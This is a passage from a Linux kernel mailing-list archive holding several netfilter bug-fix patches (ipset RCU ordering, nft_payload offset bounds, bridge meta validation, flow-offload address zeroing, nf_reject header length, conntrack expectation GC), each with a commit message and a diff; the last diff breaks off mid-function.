 }
 
 static int
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 07/14] netfilter: ipset: fix order of kfree_rcu() and rcu_assign_pointer()
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Jozsef Kadlecsik <kadlec@netfilter.org>

Sashiko pointed out that kfree_rcu() was called before
rcu_assign_pointer() in handling the comment extension.
Fix the order so that rcu_assign_pointer() is called first.

Fixes: b57b2d1fa53f ("netfilter: ipset: Prepare the ipset core to use RCU at set level")
Signed-off-by: Jozsef Kadlecsik <kadlec@netfilter.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/ipset/ip_set_core.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
index 3706b4a85a0f..a531b654b8d9 100644
--- a/net/netfilter/ipset/ip_set_core.c
+++ b/net/netfilter/ipset/ip_set_core.c
@@ -351,8 +351,8 @@ ip_set_init_comment(struct ip_set *set, struct ip_set_comment *comment,
 
 	if (unlikely(c)) {
 		set->ext_size -= sizeof(*c) + strlen(c->str) + 1;
-		kfree_rcu(c, rcu);
 		rcu_assign_pointer(comment->c, NULL);
+		kfree_rcu(c, rcu);
 	}
 	if (!len)
 		return;
@@ -393,8 +393,8 @@ ip_set_comment_free(struct ip_set *set, void *ptr)
 	if (unlikely(!c))
 		return;
 	set->ext_size -= sizeof(*c) + strlen(c->str) + 1;
-	kfree_rcu(c, rcu);
 	rcu_assign_pointer(comment->c, NULL);
+	kfree_rcu(c, rcu);
 }
 
 typedef void (*destroyer)(struct ip_set *, void *);
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 09/14] netfilter: nft_payload: reject offsets exceeding 65535 bytes
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Florian Westphal <fw@strlen.de>

Large offsets were rejected based on netlink policy, but the blamed commit
removed the policy without updating nft_payload_inner_init() to use the
truncation-check helper.

Silent truncation is not a problem, but not wanted either, so add a
check.
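
A minimal userspace sketch of the kind of range check being added follows.
The names parse_u32_check(), struct payload_model and payload_set_offset()
are hypothetical stand-ins, and the 16-bit width of the stored offset is an
assumption taken from the 65535 limit in the subject line.

```c
#include <errno.h>
#include <stdint.h>

/* Hypothetical stand-in for a truncation-check helper: accept the
 * value only if it fits below the given maximum.
 */
static int parse_u32_check(uint32_t val, uint32_t max, uint32_t *dest)
{
	if (val > max)
		return -ERANGE;
	*dest = val;
	return 0;
}

/* Assumed model: the expression stores the offset in 16 bits. */
struct payload_model {
	uint16_t offset;
};

/* Reject oversized offsets instead of silently truncating them. */
static int payload_set_offset(struct payload_model *p, uint32_t raw)
{
	uint32_t offset;
	int err;

	err = parse_u32_check(raw, UINT16_MAX, &offset);
	if (err < 0)
		return err;
	p->offset = (uint16_t)offset;
	return 0;
}
```

Without the check, a raw value of 65536 would be stored as 0 in the 16-bit
field of this model.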

Fixes: 077dc4a27579 ("netfilter: nft_payload: extend offset to 65535 bytes")
Signed-off-by: Florian Westphal <fw@strlen.de>
Reviewed-by: Fernando Fernandez Mancera <fmancera@suse.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/nft_payload.c | 16 +++++++++++++---
 1 file changed, 13 insertions(+), 3 deletions(-)

diff --git a/net/netfilter/nft_payload.c b/net/netfilter/nft_payload.c
index ef2a80dfc68f..345eff140d56 100644
--- a/net/netfilter/nft_payload.c
+++ b/net/netfilter/nft_payload.c
@@ -224,11 +224,17 @@ static int nft_payload_init(const struct nft_ctx *ctx,
 			    const struct nlattr * const tb[])
 {
 	struct nft_payload *priv = nft_expr_priv(expr);
+	u32 offset;
+	int err;
 
 	priv->base   = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_BASE]));
-	priv->offset = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_OFFSET]));
 	priv->len    = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_LEN]));
 
+	err = nft_parse_u32_check(tb[NFTA_PAYLOAD_OFFSET], U16_MAX, &offset);
+	if (err < 0)
+		return err;
+	priv->offset = offset;
+
 	return nft_parse_register_store(ctx, tb[NFTA_PAYLOAD_DREG],
 					&priv->dreg, NULL, NFT_DATA_VALUE,
 					priv->len);
@@ -621,7 +627,8 @@ static int nft_payload_inner_init(const struct nft_ctx *ctx,
 				  const struct nlattr * const tb[])
 {
 	struct nft_payload *priv = nft_expr_priv(expr);
-	u32 base;
+	u32 base, offset;
+	int err;
 
 	if (!tb[NFTA_PAYLOAD_BASE] || !tb[NFTA_PAYLOAD_OFFSET] ||
 	    !tb[NFTA_PAYLOAD_LEN] || !tb[NFTA_PAYLOAD_DREG])
@@ -639,8 +646,11 @@ static int nft_payload_inner_init(const struct nft_ctx *ctx,
 	}
 
 	priv->base   = base;
-	priv->offset = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_OFFSET]));
 	priv->len    = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_LEN]));
+	err = nft_parse_u32_check(tb[NFTA_PAYLOAD_OFFSET], U16_MAX, &offset);
+	if (err < 0)
+		return err;
+	priv->offset = offset;
 
 	return nft_parse_register_store(ctx, tb[NFTA_PAYLOAD_DREG],
 					&priv->dreg, NULL, NFT_DATA_VALUE,
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 10/14] netfilter: nft_meta_bridge: add validate callback for get operations
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Florian Westphal <fw@strlen.de>

The blamed commit added NFT_META_BRI_IIFHWADDR to the set validate callback,
yet this is a get operation.

Add a get validate callback and move the NFT_META_BRI_IIFHWADDR key
there.

AFAICS this is harmless: NFT_META_BRI_IIFHWADDR can deal with a NULL
input device and the set handler ignores a NFT_META_BRI_IIFHWADDR
operation, but it allows reading 4 bytes off bridge skb->cb[].

Fixes: cbd2257dc96e ("netfilter: nft_meta_bridge: introduce NFT_META_BRI_IIFHWADDR support")
Signed-off-by: Florian Westphal <fw@strlen.de>
Reviewed-by: Fernando Fernandez Mancera <fmancera@suse.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 include/net/netfilter/nft_meta.h       |  2 ++
 net/bridge/netfilter/nft_meta_bridge.c | 19 ++++++++++++++++++-
 net/netfilter/nft_meta.c               |  5 +++--
 3 files changed, 23 insertions(+), 3 deletions(-)

diff --git a/include/net/netfilter/nft_meta.h b/include/net/netfilter/nft_meta.h
index f74e63290603..6cf1d910bbf8 100644
--- a/include/net/netfilter/nft_meta.h
+++ b/include/net/netfilter/nft_meta.h
@@ -40,6 +40,8 @@ void nft_meta_set_eval(const struct nft_expr *expr,
 void nft_meta_set_destroy(const struct nft_ctx *ctx,
 			  const struct nft_expr *expr);
 
+int nft_meta_get_validate(const struct nft_ctx *ctx,
+			  const struct nft_expr *expr);
 int nft_meta_set_validate(const struct nft_ctx *ctx,
 			  const struct nft_expr *expr);
 
diff --git a/net/bridge/netfilter/nft_meta_bridge.c b/net/bridge/netfilter/nft_meta_bridge.c
index 219c40680260..3d95f68e0906 100644
--- a/net/bridge/netfilter/nft_meta_bridge.c
+++ b/net/bridge/netfilter/nft_meta_bridge.c
@@ -107,12 +107,30 @@ static int nft_meta_bridge_get_init(const struct nft_ctx *ctx,
 					NULL, NFT_DATA_VALUE, len);
 }
 
+static int nft_meta_bridge_get_validate(const struct nft_ctx *ctx,
+					const struct nft_expr *expr)
+{
+	struct nft_meta *priv = nft_expr_priv(expr);
+	unsigned int hooks;
+
+	switch (priv->key) {
+	case NFT_META_BRI_IIFHWADDR:
+		hooks = 1 << NF_BR_PRE_ROUTING;
+		break;
+	default:
+		return nft_meta_get_validate(ctx, expr);
+	}
+
+	return nft_chain_validate_hooks(ctx->chain, hooks);
+}
+
 static struct nft_expr_type nft_meta_bridge_type;
 static const struct nft_expr_ops nft_meta_bridge_get_ops = {
 	.type		= &nft_meta_bridge_type,
 	.size		= NFT_EXPR_SIZE(sizeof(struct nft_meta)),
 	.eval		= nft_meta_bridge_get_eval,
 	.init		= nft_meta_bridge_get_init,
+	.validate	= nft_meta_bridge_get_validate,
 	.dump		= nft_meta_get_dump,
 };
 
@@ -168,7 +186,6 @@ static int nft_meta_bridge_set_validate(const struct nft_ctx *ctx,
 
 	switch (priv->key) {
 	case NFT_META_BRI_BROUTE:
-	case NFT_META_BRI_IIFHWADDR:
 		hooks = 1 << NF_BR_PRE_ROUTING;
 		break;
 	default:
diff --git a/net/netfilter/nft_meta.c b/net/netfilter/nft_meta.c
index 9b5821c64442..0a43e0787a68 100644
--- a/net/netfilter/nft_meta.c
+++ b/net/netfilter/nft_meta.c
@@ -635,8 +635,8 @@ static int nft_meta_get_validate_xfrm(const struct nft_ctx *ctx)
 #endif
 }
 
-static int nft_meta_get_validate(const struct nft_ctx *ctx,
-				 const struct nft_expr *expr)
+int nft_meta_get_validate(const struct nft_ctx *ctx,
+			  const struct nft_expr *expr)
 {
 	const struct nft_meta *priv = nft_expr_priv(expr);
 
@@ -652,6 +652,7 @@ static int nft_meta_get_validate(const struct nft_ctx *ctx,
 
 	return 0;
 }
+EXPORT_SYMBOL_GPL(nft_meta_get_validate);
 
 int nft_meta_set_validate(const struct nft_ctx *ctx,
 			  const struct nft_expr *expr)
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 11/14] netfilter: nft_flow_offload: zero device address for non-ether case
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Florian Westphal <fw@strlen.de>

LLM points out that the skip causes an uninitialised stack array to
propagate down into dev_fill_forward_path().  It's not clear to me that
there is a guarantee that a later ctx.dev->netdev_ops->ndo_fill_forward_path()
would always fix this up.

Cc: Felix Fietkau <nbd@nbd.name>
Fixes: 45ca3e61999e ("netfilter: nft_flow_offload: skip dst neigh lookup for ppp devices")
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/nf_flow_table_path.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/net/netfilter/nf_flow_table_path.c b/net/netfilter/nf_flow_table_path.c
index 1e7e216b9f89..98c03b487f52 100644
--- a/net/netfilter/nf_flow_table_path.c
+++ b/net/netfilter/nf_flow_table_path.c
@@ -53,8 +53,10 @@ static int nft_dev_fill_forward_path(const struct nf_flow_route *route,
 	struct neighbour *n;
 	u8 nud_state;
 
-	if (!nft_is_valid_ether_device(dev))
+	if (!nft_is_valid_ether_device(dev)) {
+		eth_zero_addr(ha);
 		goto out;
+	}
 
 	n = dst_neigh_lookup(dst_cache, daddr);
 	if (!n)
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 12/14] netfilter: nf_reject: skip iphdr options when looking for icmp header
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Florian Westphal <fw@strlen.de>

Not a big deal, but this should have used the real IP header length and not
the base header size.  As-is, if there are options then the
nf_skb_is_icmp_unreach() result will be random.
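
To make the off-by-options problem concrete, here is a small userspace
sketch over a raw byte buffer. It is only a model: ipv4_hdrlen() and
icmp_type_after_ipv4() are hypothetical helpers, not the kernel's
ip_hdrlen() or nf_skb_is_icmp_unreach().

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* IPv4 header length in bytes: the low nibble of byte 0 (IHL) counts
 * 32-bit words, so options make the header longer than 20 bytes.
 */
static size_t ipv4_hdrlen(const uint8_t *pkt)
{
	return (size_t)(pkt[0] & 0x0f) * 4;
}

/* Hypothetical helper: read the ICMP type that follows the IPv4 header.
 * Returns false if the packet is too short or the IHL is invalid.
 */
static bool icmp_type_after_ipv4(const uint8_t *pkt, size_t len,
				 uint8_t *type)
{
	size_t thoff;

	if (len < 20)
		return false;
	thoff = ipv4_hdrlen(pkt);
	if (thoff < 20 || thoff >= len)
		return false;
	/* The ICMP type is the first byte of the ICMP header. */
	*type = pkt[thoff];
	return true;
}
```

With one 4-byte option (IHL = 6) the ICMP header starts at byte 24; reading
at the fixed offset 20 would return an option byte instead of the type.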

Fixes: db99b2f2b3e2 ("netfilter: nf_reject: don't reply to icmp error messages")
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/ipv4/netfilter/nf_reject_ipv4.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/ipv4/netfilter/nf_reject_ipv4.c b/net/ipv4/netfilter/nf_reject_ipv4.c
index fecf6621f679..4626dc46808f 100644
--- a/net/ipv4/netfilter/nf_reject_ipv4.c
+++ b/net/ipv4/netfilter/nf_reject_ipv4.c
@@ -89,7 +89,7 @@ static bool nf_skb_is_icmp_unreach(const struct sk_buff *skb)
 	if (iph->protocol != IPPROTO_ICMP)
 		return false;
 
-	thoff = skb_network_offset(skb) + sizeof(*iph);
+	thoff = skb_network_offset(skb) + ip_hdrlen(skb);
 
 	tp = skb_header_pointer(skb,
 				thoff + offsetof(struct icmphdr, type),
-- 
2.47.3


* [PATCH net 13/14] netfilter: nf_conntrack_expect: use conntrack GC to reap expectations
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

This patch replaces the timer API with a GC worker approach for
expectations, as has already happened in many other subsystems.

Use the existing conntrack GC worker to iterate over the local list of
expectations in the master conntrack to reap expired expectations.
Check IPS_HELPER_BIT to run GC for expectations, set it on for nft_ct
expectation which never sets it. Hold the expectation spinlock while
iterating over the master conntrack expectation list to synchronize with
nf_ct_remove_expectations(). This also performs runtime packet path
garbage collection through the expectation insertion and lookup
functions while walking over one of the chains of the global expectation
hashtables. Unconfirmed conntrack entries are skipped since ct->ext can
be reallocated, and dying entries are skipped since those will be gone
soon. Set IPS_HELPER_BIT when the helper ct extension is added, so the
new GC worker does not need to bump the ct refcount to check if the
ct->ext helper is available.

This removes the extra refcount bump for expectation timers, which
allows removing several nf_ct_expect_put() calls after the unlink. After
this update, the refcount remains at 1 while the expectation is on the
expectation hashes.

This patch implicitly addresses a race with the existing timer API that
allows an expectation to access a stale exp->master pointer which has
already been released when expectation removal loses a race with an
expiring timer, i.e. timer_delete() returning false.

Add a new NF_CT_EXPECT_DEAD flag to mark an expectation to be reaped via
GC. This is needed by nf_ct_unexpect_related(), which is called in error
paths to invalidate newly created expectations that have been added into
the hashes. These expectations cannot be released immediately, as GC or
nf_ct_remove_expectations() could race to release them. On expectation
insert, the runtime GC reaps stale expectations before checking the
expectation limit set by policy.

Set the current timestamp in nf_ct_expect_alloc(), then add the
expectation policy timeout (or a custom timeout, added on top of it) to
specify the expectation lifetime.

Fixes: bffcaad9afdf ("netfilter: ctnetlink: ensure safe access to master conntrack")
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 include/net/netfilter/nf_conntrack_expect.h   |  16 +-
 .../linux/netfilter/nf_conntrack_common.h     |   1 +
 net/netfilter/nf_conntrack_core.c             |  33 +++-
 net/netfilter/nf_conntrack_expect.c           | 145 +++++++++---------
 net/netfilter/nf_conntrack_h323_main.c        |   4 +-
 net/netfilter/nf_conntrack_helper.c           |  10 +-
 net/netfilter/nf_conntrack_netlink.c          |  22 ++-
 net/netfilter/nf_conntrack_sip.c              |  13 +-
 net/netfilter/nft_ct.c                        |   3 +-
 9 files changed, 139 insertions(+), 108 deletions(-)
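
As a rough illustration of the expiry scheme described in the commit
message, the following userspace sketch stores an absolute 32-bit
deadline per entry and lets a sweep unlink entries that are expired or
flagged dead. All names here (struct exp_entry, exp_is_expired(),
exp_gc(), EXP_FLAG_DEAD) are hypothetical stand-ins, there is no locking
or RCU, and `now` is passed in explicitly instead of being read from a
clock. It is a sketch under those assumptions, not the kernel
implementation.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative counterpart of a "dead" flag; the value is arbitrary. */
#define EXP_FLAG_DEAD 0x8u

struct exp_entry {
	uint32_t timeout;		/* absolute deadline, in 32-bit ticks */
	uint32_t flags;
	struct exp_entry *next;
};

static bool exp_is_expired(const struct exp_entry *e, uint32_t now)
{
	if (e->flags & EXP_FLAG_DEAD)
		return true;

	/*
	 * Take the difference in unsigned arithmetic, then interpret it
	 * as signed. On two's complement targets this stays correct
	 * when the tick counter wraps around.
	 */
	return (int32_t)(e->timeout - now) <= 0;
}

/* Unlink every expired entry from the list; return how many were reaped. */
static unsigned int exp_gc(struct exp_entry **head, uint32_t now)
{
	struct exp_entry **pp = head;
	unsigned int reaped = 0;

	while (*pp) {
		struct exp_entry *e = *pp;

		if (exp_is_expired(e, now)) {
			*pp = e->next;	/* unlink; the caller owns the memory */
			e->next = NULL;
			reaped++;
			continue;
		}
		pp = &e->next;
	}

	return reaped;
}
```

Marking an entry dead and leaving the unlink to the sweep means only one
code path removes entries from the list, which is the property the
timer-based scheme lacked.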

diff --git a/include/net/netfilter/nf_conntrack_expect.h b/include/net/netfilter/nf_conntrack_expect.h
index 80f50fd0f7ad..be4a120d549e 100644
--- a/include/net/netfilter/nf_conntrack_expect.h
+++ b/include/net/netfilter/nf_conntrack_expect.h
@@ -54,8 +54,8 @@ struct nf_conntrack_expect {
 	/* The conntrack of the master connection */
 	struct nf_conn *master;
 
-	/* Timer function; deletes the expectation. */
-	struct timer_list timeout;
+	/* jiffies32 when this expectation expires */
+	u32 timeout;
 
 #if IS_ENABLED(CONFIG_NF_NAT)
 	union nf_inet_addr saved_addr;
@@ -69,6 +69,14 @@ struct nf_conntrack_expect {
 	struct rcu_head rcu;
 };
 
+static inline bool nf_ct_exp_is_expired(const struct nf_conntrack_expect *exp)
+{
+	if (READ_ONCE(exp->flags) & NF_CT_EXPECT_DEAD)
+		return true;
+
+	return (__s32)(READ_ONCE(exp->timeout) - nfct_time_stamp) <= 0;
+}
+
 static inline struct net *nf_ct_exp_net(struct nf_conntrack_expect *exp)
 {
 	return read_pnet(&exp->net);
@@ -130,7 +138,6 @@ static inline void nf_ct_unlink_expect(struct nf_conntrack_expect *exp)
 
 void nf_ct_remove_expectations(struct nf_conn *ct);
 void nf_ct_unexpect_related(struct nf_conntrack_expect *exp);
-bool nf_ct_remove_expect(struct nf_conntrack_expect *exp);
 
 void nf_ct_expect_iterate_destroy(bool (*iter)(struct nf_conntrack_expect *e, void *data), void *data);
 void nf_ct_expect_iterate_net(struct net *net,
@@ -153,5 +160,8 @@ static inline int nf_ct_expect_related(struct nf_conntrack_expect *expect,
 	return nf_ct_expect_related_report(expect, 0, 0, flags);
 }
 
+struct nf_conn_help;
+void nf_ct_expectation_gc(struct nf_conn_help *master_help);
+
 #endif /*_NF_CONNTRACK_EXPECT_H*/
 
diff --git a/include/uapi/linux/netfilter/nf_conntrack_common.h b/include/uapi/linux/netfilter/nf_conntrack_common.h
index 56b6b60a814f..ee51045ae1d6 100644
--- a/include/uapi/linux/netfilter/nf_conntrack_common.h
+++ b/include/uapi/linux/netfilter/nf_conntrack_common.h
@@ -160,6 +160,7 @@ enum ip_conntrack_expect_events {
 #define NF_CT_EXPECT_USERSPACE		0x4
 
 #ifdef __KERNEL__
+#define NF_CT_EXPECT_DEAD		0x8
 #define NF_CT_EXPECT_MASK	(NF_CT_EXPECT_PERMANENT | NF_CT_EXPECT_INACTIVE | \
 				 NF_CT_EXPECT_USERSPACE)
 #endif
diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
index 4fb3a2d18631..784bd1d7a9bf 100644
--- a/net/netfilter/nf_conntrack_core.c
+++ b/net/netfilter/nf_conntrack_core.c
@@ -1471,6 +1471,31 @@ static bool gc_worker_can_early_drop(const struct nf_conn *ct)
 	return false;
 }
 
+static void nf_ct_help_gc(struct nf_conn *ct)
+{
+	struct nf_conn_help *help;
+
+	if (!refcount_inc_not_zero(&ct->ct_general.use))
+		return;
+
+	/* load ->status after refcount increase */
+	smp_acquire__after_ctrl_dep();
+
+	if (!nf_ct_is_confirmed(ct) || nf_ct_is_dying(ct)) {
+		nf_ct_put(ct);
+		return;
+	}
+
+	/* re-check helper due to SLAB_TYPESAFE_BY_RCU */
+	if (test_bit(IPS_HELPER_BIT, &ct->status)) {
+		help = nfct_help(ct);
+		if (help)
+			nf_ct_expectation_gc(help);
+	}
+
+	nf_ct_put(ct);
+}
+
 static void gc_worker(struct work_struct *work)
 {
 	unsigned int i, hashsz, nf_conntrack_max95 = 0;
@@ -1543,7 +1568,13 @@ static void gc_worker(struct work_struct *work)
 			expires = (expires - (long)next_run) / ++count;
 			next_run += expires;
 
-			if (nf_conntrack_max95 == 0 || gc_worker_skip_ct(tmp))
+			if (gc_worker_skip_ct(tmp))
+				continue;
+
+			if (test_bit(IPS_HELPER_BIT, &tmp->status))
+				nf_ct_help_gc(tmp);
+
+			if (nf_conntrack_max95 == 0)
 				continue;
 
 			net = nf_ct_net(tmp);
diff --git a/net/netfilter/nf_conntrack_expect.c b/net/netfilter/nf_conntrack_expect.c
index 5c9b17835c28..49e18eda037e 100644
--- a/net/netfilter/nf_conntrack_expect.c
+++ b/net/netfilter/nf_conntrack_expect.c
@@ -43,6 +43,24 @@ unsigned int nf_ct_expect_max __read_mostly;
 static struct kmem_cache *nf_ct_expect_cachep __read_mostly;
 static siphash_aligned_key_t nf_ct_expect_hashrnd;
 
+void nf_ct_expectation_gc(struct nf_conn_help *master_help)
+{
+	struct nf_conntrack_expect *exp;
+	struct hlist_node *next;
+
+	if (hlist_empty(&master_help->expectations))
+		return;
+
+	spin_lock_bh(&nf_conntrack_expect_lock);
+	hlist_for_each_entry_safe(exp, next, &master_help->expectations, lnode) {
+		if (!nf_ct_exp_is_expired(exp))
+			continue;
+
+		nf_ct_unlink_expect(exp);
+	}
+	spin_unlock_bh(&nf_conntrack_expect_lock);
+}
+
 /* nf_conntrack_expect helper functions */
 void nf_ct_unlink_expect_report(struct nf_conntrack_expect *exp,
 				u32 portid, int report)
@@ -52,7 +70,6 @@ void nf_ct_unlink_expect_report(struct nf_conntrack_expect *exp,
 	struct nf_conntrack_net *cnet;
 
 	lockdep_nfct_expect_lock_held();
-	WARN_ON_ONCE(timer_pending(&exp->timeout));
 
 	hlist_del_rcu(&exp->hnode);
 
@@ -70,16 +87,6 @@ void nf_ct_unlink_expect_report(struct nf_conntrack_expect *exp,
 }
 EXPORT_SYMBOL_GPL(nf_ct_unlink_expect_report);
 
-static void nf_ct_expectation_timed_out(struct timer_list *t)
-{
-	struct nf_conntrack_expect *exp = timer_container_of(exp, t, timeout);
-
-	spin_lock_bh(&nf_conntrack_expect_lock);
-	nf_ct_unlink_expect(exp);
-	spin_unlock_bh(&nf_conntrack_expect_lock);
-	nf_ct_expect_put(exp);
-}
-
 static unsigned int nf_ct_expect_dst_hash(const struct net *n, const struct nf_conntrack_tuple *tuple)
 {
 	struct {
@@ -117,19 +124,6 @@ nf_ct_exp_equal(const struct nf_conntrack_tuple *tuple,
 	       nf_ct_exp_zone_equal_any(i, zone);
 }
 
-bool nf_ct_remove_expect(struct nf_conntrack_expect *exp)
-{
-	lockdep_nfct_expect_lock_held();
-
-	if (timer_delete(&exp->timeout)) {
-		nf_ct_unlink_expect(exp);
-		nf_ct_expect_put(exp);
-		return true;
-	}
-	return false;
-}
-EXPORT_SYMBOL_GPL(nf_ct_remove_expect);
-
 struct nf_conntrack_expect *
 __nf_ct_expect_find(struct net *net,
 		    const struct nf_conntrack_zone *zone,
@@ -144,6 +138,8 @@ __nf_ct_expect_find(struct net *net,
 
 	h = nf_ct_expect_dst_hash(net, tuple);
 	hlist_for_each_entry_rcu(i, &nf_ct_expect_hash[h], hnode) {
+		if (nf_ct_exp_is_expired(i))
+			continue;
 		if (nf_ct_exp_equal(tuple, i, zone, net))
 			return i;
 	}
@@ -178,6 +174,7 @@ nf_ct_find_expectation(struct net *net,
 {
 	struct nf_conntrack_net *cnet = nf_ct_pernet(net);
 	struct nf_conntrack_expect *i, *exp = NULL;
+	struct hlist_node *next;
 	unsigned int h;
 
 	lockdep_nfct_expect_lock_held();
@@ -186,7 +183,11 @@ nf_ct_find_expectation(struct net *net,
 		return NULL;
 
 	h = nf_ct_expect_dst_hash(net, tuple);
-	hlist_for_each_entry(i, &nf_ct_expect_hash[h], hnode) {
+	hlist_for_each_entry_safe(i, next, &nf_ct_expect_hash[h], hnode) {
+		if (nf_ct_exp_is_expired(i)) {
+			nf_ct_unlink_expect(i);
+			continue;
+		}
 		if (!(i->flags & NF_CT_EXPECT_INACTIVE) &&
 		    nf_ct_exp_equal(tuple, i, zone, net)) {
 			exp = i;
@@ -196,13 +197,16 @@ nf_ct_find_expectation(struct net *net,
 	if (!exp)
 		return NULL;
 
+	if (!refcount_inc_not_zero(&exp->use))
+		return NULL;
+
 	/* If master is not in hash table yet (ie. packet hasn't left
 	   this machine yet), how can other end know about expected?
 	   Hence these are not the droids you are looking for (if
 	   master ct never got confirmed, we'd hold a reference to it
 	   and weird things would happen to future packets). */
 	if (!nf_ct_is_confirmed(exp->master))
-		return NULL;
+		goto err_release_exp;
 
 	/* Avoid race with other CPUs, that for exp->master ct, is
 	 * about to invoke ->destroy(), or nf_ct_delete() via timeout
@@ -214,18 +218,17 @@ nf_ct_find_expectation(struct net *net,
 	 */
 	if (unlikely(nf_ct_is_dying(exp->master) ||
 		     !refcount_inc_not_zero(&exp->master->ct_general.use)))
-		return NULL;
+		goto err_release_exp;
 
-	if (exp->flags & NF_CT_EXPECT_PERMANENT || !unlink) {
-		refcount_inc(&exp->use);
-		return exp;
-	} else if (timer_delete(&exp->timeout)) {
-		nf_ct_unlink_expect(exp);
+	if (exp->flags & NF_CT_EXPECT_PERMANENT || !unlink)
 		return exp;
-	}
-	/* Undo exp->master refcnt increase, if timer_delete() failed */
-	nf_ct_put(exp->master);
 
+	nf_ct_unlink_expect(exp);
+
+	return exp;
+
+err_release_exp:
+	nf_ct_expect_put(exp);
 	return NULL;
 }
 
@@ -241,9 +244,8 @@ void nf_ct_remove_expectations(struct nf_conn *ct)
 		return;
 
 	spin_lock_bh(&nf_conntrack_expect_lock);
-	hlist_for_each_entry_safe(exp, next, &help->expectations, lnode) {
-		nf_ct_remove_expect(exp);
-	}
+	hlist_for_each_entry_safe(exp, next, &help->expectations, lnode)
+		nf_ct_unlink_expect(exp);
 	spin_unlock_bh(&nf_conntrack_expect_lock);
 }
 EXPORT_SYMBOL_GPL(nf_ct_remove_expectations);
@@ -292,7 +294,7 @@ static bool master_matches(const struct nf_conntrack_expect *a,
 void nf_ct_unexpect_related(struct nf_conntrack_expect *exp)
 {
 	spin_lock_bh(&nf_conntrack_expect_lock);
-	nf_ct_remove_expect(exp);
+	WRITE_ONCE(exp->flags, exp->flags | NF_CT_EXPECT_DEAD);
 	spin_unlock_bh(&nf_conntrack_expect_lock);
 }
 EXPORT_SYMBOL_GPL(nf_ct_unexpect_related);
@@ -308,6 +310,7 @@ struct nf_conntrack_expect *nf_ct_expect_alloc(struct nf_conn *me)
 	if (!new)
 		return NULL;
 
+	new->timeout = nfct_time_stamp;
 	new->master = me;
 	refcount_set(&new->use, 1);
 	return new;
@@ -413,17 +416,12 @@ static void nf_ct_expect_insert(struct nf_conntrack_expect *exp,
 	struct net *net = nf_ct_exp_net(exp);
 	unsigned int h = nf_ct_expect_dst_hash(net, &exp->tuple);
 
-	/* two references : one for hash insert, one for the timer */
-	refcount_add(2, &exp->use);
+	refcount_inc(&exp->use);
 
-	timer_setup(&exp->timeout, nf_ct_expectation_timed_out, 0);
 	helper = rcu_dereference_protected(master_help->helper,
 					   lockdep_is_held(&nf_conntrack_expect_lock));
-	if (helper) {
-		exp->timeout.expires = jiffies +
-			helper->expect_policy[exp->class].timeout * HZ;
-	}
-	add_timer(&exp->timeout);
+	if (helper)
+		exp->timeout += helper->expect_policy[exp->class].timeout * HZ;
 
 	hlist_add_head_rcu(&exp->lnode, &master_help->expectations);
 	master_help->expecting[exp->class]++;
@@ -435,19 +433,26 @@ static void nf_ct_expect_insert(struct nf_conntrack_expect *exp,
 	NF_CT_STAT_INC(net, expect_create);
 }
 
-/* Race with expectations being used means we could have none to find; OK. */
 static void evict_oldest_expect(struct nf_conn_help *master_help,
-				struct nf_conntrack_expect *new)
+				struct nf_conntrack_expect *new,
+				const struct nf_conntrack_expect_policy *p)
 {
 	struct nf_conntrack_expect *exp, *last = NULL;
+	struct hlist_node *next;
 
-	hlist_for_each_entry(exp, &master_help->expectations, lnode) {
+	hlist_for_each_entry_safe(exp, next, &master_help->expectations, lnode) {
+		if (nf_ct_exp_is_expired(exp)) {
+			nf_ct_unlink_expect(exp);
+			continue;
+		}
 		if (exp->class == new->class)
 			last = exp;
 	}
 
-	if (last)
-		nf_ct_remove_expect(last);
+	/* Still worth to evict oldest expectation after garbage collection? */
+	if (last &&
+	    master_help->expecting[last->class] >= p->max_expected)
+		nf_ct_unlink_expect(last);
